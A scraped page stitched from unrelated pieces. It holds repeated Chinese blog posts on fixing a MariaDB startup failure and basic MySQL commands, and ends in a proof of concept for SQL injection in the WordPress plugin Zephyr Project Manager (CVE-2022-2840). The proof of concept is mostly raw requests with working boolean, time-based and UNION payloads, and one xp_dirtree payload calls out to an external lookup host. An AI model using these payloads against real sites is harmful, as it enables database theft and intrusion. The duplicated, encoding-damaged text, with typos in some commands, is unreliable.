搜索论坛

中午还在午休，在以前公司上班的同时发来消息，说是数据库挂掉了。让我帮他看看。嗯……（虽然已离职，但是感情还是有的吗。）发来截图。的确是数据库挂掉了。 然后，开始了我一下午的填坑记。 恩嫩，mmp先看看能不能启动数据库。执行命令： service mysqld start恩 ，报错。 提示错误：/var/lib/mysql/mysql.cock 估计是mysql.sock文件丢失。然后已在遵循先百度后google的原则，找了半天还是无法解决问题。过程太艰苦。就不说了…… 查看数据库日志 恩恩 ，早上11:05分挂掉的。资讯了下十一点的时候有么有对数据库操作。说着是新增了虚拟主机来着，对数据库没有操作。这个就怪了…… 没事，我们接着找原因，既然是mysql.sock文件丢失，能不能从其他地方复制一份呢？ 结果还是失败 mmp。想着不行就直接从装数据库吧，但是他那边没有备份，这时只能用一首《凉凉》来形容当时的心境了。好吧！不放弃接着找原因。 对当前系统分析 系统：centos7数据库：mariadb引擎: apache 等等，centos7中。使用mariadb代替了mysql。这也许不是mysql的问题而是mariadb的问题。 OK，我们试着启动mariadb service mariadb startOK，伟大的mysql终于启动了 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/161.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

1.mysql的安装及卸载mysqld -install [服务名] 服务名称默认是mysql,若没有特殊需求 不建议修改 mysqld -remove [服务名] 或者 remove MYSQL(服务名) 2.mysql服务的启动和停止net start mysql net stop mysql3.登录MYSQLmysql -h主机地址 -u用户名 －p用户密码 （如连接远程数据库 ：mysql -h192.168.xxx.xxx -uroot -p123） 　mysql -u用户名 -p用户密码（如连接本地数据库：mysql -uroot -p123） 4.显示命令：数据库版本信息：show variables like '%version%' 显示数据库列表 显示库中的数据表 use mysql;//打开数据库 show tables;显示数据表的结构： describe 表名;查看当前使用的数据库 select database(); 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/163.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

中午还在午休，在以前公司上班的同时发来消息，说是数据库挂掉了。让我帮他看看。嗯……（虽然已离职，但是感情还是有的吗。）发来截图。的确是数据库挂掉了。 然后，开始了我一下午的填坑记。 恩嫩，mmp先看看能不能启动数据库。执行命令： service mysqld start恩 ，报错。 提示错误：/var/lib/mysql/mysql.cock 估计是mysql.sock文件丢失。然后已在遵循先百度后google的原则，找了半天还是无法解决问题。过程太艰苦。就不说了…… 查看数据库日志 恩恩 ，早上11:05分挂掉的。资讯了下十一点的时候有么有对数据库操作。说着是新增了虚拟主机来着，对数据库没有操作。这个就怪了…… 没事，我们接着找原因，既然是mysql.sock文件丢失，能不能从其他地方复制一份呢？ 结果还是失败 mmp。想着不行就直接从装数据库吧，但是他那边没有备份，这时只能用一首《凉凉》来形容当时的心境了。好吧！不放弃接着找原因。 对当前系统分析 系统：centos7数据库：mariadb引擎: apache 等等，centos7中。使用mariadb代替了mysql。这也许不是mysql的问题而是mariadb的问题。 OK，我们试着启动mariadb service mariadb startOK，伟大的mysql终于启动了 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/161.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

一：登录数据库格式：mysql -u 用户名 -p mysql -u root -p 数据密码后进入数据库： 二：显示数据库：show databases; 三:显示表use dvwa; #选择数据库 show tables; #显示表 四：查询 select * from users; 五：新建数据库create database xxx;xxx为数据库的名称 六：删除数据库drop database xxx; 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/165.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

1.mysql的安装及卸载mysqld -install [服务名] 服务名称默认是mysql,若没有特殊需求 不建议修改 mysqld -remove [服务名] 或者 remove MYSQL(服务名) 2.mysql服务的启动和停止net start mysql net stop mysql3.登录MYSQLmysql -h主机地址 -u用户名 －p用户密码 （如连接远程数据库 ：mysql -h192.168.xxx.xxx -uroot -p123） 　mysql -u用户名 -p用户密码（如连接本地数据库：mysql -uroot -p123） 4.显示命令：数据库版本信息：show variables like '%version%' 显示数据库列表 显示库中的数据表 use mysql;//打开数据库 show tables;显示数据表的结构： describe 表名;查看当前使用的数据库 select database(); 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/163.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

一：登录数据库格式：mysql -u 用户名 -p mysql -u root -p 数据密码后进入数据库： 二：显示数据库：show databases; 三:显示表use dvwa; #选择数据库 show tables; #显示表 四：查询 select * from users; 五：新建数据库create database xxx;xxx为数据库的名称 六：删除数据库drop database xxx; 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/165.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

登录数据库mysql -u root -p显示数据库show databases;选择数据库use dbname;显示数据库中的表show tables;新建数据库create database dbname;删除数据库dorp database dbname;显示表结构desc dbname;查询数据库selcet *from dbname; 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/264.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

登录数据库mysql -u root -p显示数据库show databases;选择数据库use dbname;显示数据库中的表show tables;新建数据库create database dbname;删除数据库dorp database dbname;显示表结构desc dbname;查询数据库selcet *from dbname; 版权属于：逍遥子大表哥 本文链接：https://blog.bbskali.cn/264.html 按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

# Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi # Date: 14-08-2022 # Exploit Author: Rizacan Tufan # Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated # Software Link: https://wordpress.org/plugins/zephyr-project-manager/ # Vendor Homepage: https://zephyr-one.com/ # Version: 3.2.42 # Tested on: Windows, Linux # CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c) # Description Zephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks. It has been determined that the data coming from the input field in most places throughout the application are used in=20 the query without any sanitize and validation. The details of the discovery are given below. # Proof of Concept (PoC)=20 The details of the various SQL Injection on the application are given below. ## Endpoint of Get Project Data. Sample Request :=20 POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_projects Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8 X-Requested-With: XMLHttpRequest Content-Length: 74 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers action=3Dzpm_view_project&project_id=3D1&zpm_nonce=3D22858bf3a7 Payload :=20 --- Parameter: project_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: action=3Dzpm_view_project&project_id=3D1 AND 4923=3D4923&zpm_nonce=3D22858bf3a7 Type: time-based blind Title: MySQL >=3D 5.0.12 OR time-based blind (query SLEEP) Payload: action=3Dzpm_view_project&project_id=3D1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=3D22858bf3a7 Type: UNION query Title: Generic UNION query (NULL) - 20 columns Payload: action=3Dzpm_view_project&project_id=3D-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=3D22858bf3a7 --- ## Endpoint of Get Task Data. Sample Request :=20 POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasks Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8 X-Requested-With: XMLHttpRequest Content-Length: 51 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers task_id=3D1&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7 Payload :=20 --- Parameter: task_id (POST) Type: time-based blind Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP) Payload: task_id=3D1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7 --- ## Endpoint of New Task. Sample Request :=20 POST /wp-admin/admin-ajax.php HTTP/2 Host: vuln.local Cookie: ... ... Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasks Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8 X-Requested-With: XMLHttpRequest Content-Length: 337 Origin: https://vuln.local Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers task_name=3Dtest&task_description=3Dtest&task_project=3D1&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Dtest&type=3Ddefault&recurrence%5Btype%5D=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7 Payload :=20 --- Parameter: task_project (POST) Type: time-based blind Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP) Payload: task_name=3Dtest&task_description=3Dtest&task_project=3D1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Drrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=3Ddefault&recurrence[type]=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7 ---